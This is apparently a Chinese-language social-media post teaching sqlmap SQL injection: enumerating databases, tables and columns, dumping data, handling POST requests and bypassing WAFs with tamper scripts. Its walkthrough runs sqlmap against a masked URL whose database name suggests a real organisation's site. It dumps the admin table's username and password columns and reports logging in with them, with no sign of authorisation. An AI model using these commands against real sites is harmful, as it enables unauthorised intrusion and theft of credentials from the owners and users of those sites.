sqlmap加速了sql注入的发展,需要掌握6点,其一是--dbs获得数据库名称,其二是-D 数据库名称 --tables 获得数据库中的所有表名,其三是-D 数据库名 -T 表名 -C 字段1,字段2 --dump 获得数据库中的表中的字段的值,其四是-r POST请求.txt针对POST请求进行sql注入,其五是已知数据库用--dbms MYSQL进行漏洞探测,其六是使用--tamper变形载核绕过WAF。ailx10 预祝大家:2023护网取得好成绩~
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
sqlmap注入,获得数据库名称(--dbs)
sqlmap -u "https://****" --dbs
sqlmap注入,获得数据库中的所有表名(-D 数据库名称 --tables)
sqlmap -u "https://***" -D toaa2001_org_tw --tables
sqlmap注入,获得数据库中的表中的所有字段(-D 数据库名 -T 表名 --columns)
sqlmap -u "https://***" -D toaa2001_org_tw -T admin --columns
sqlmap注入,获得数据库中的表中的字段的值(-D 数据库名 -T 表名 -C 字段1,字段2 --dump)
sqlmap -u "https://***" -D toaa2001_org_tw -T admin -C A_Pass,A_User --dump
使用账号和密码登录网站
登录网站成功,sqlmap就是这么朴实无华,且枯燥
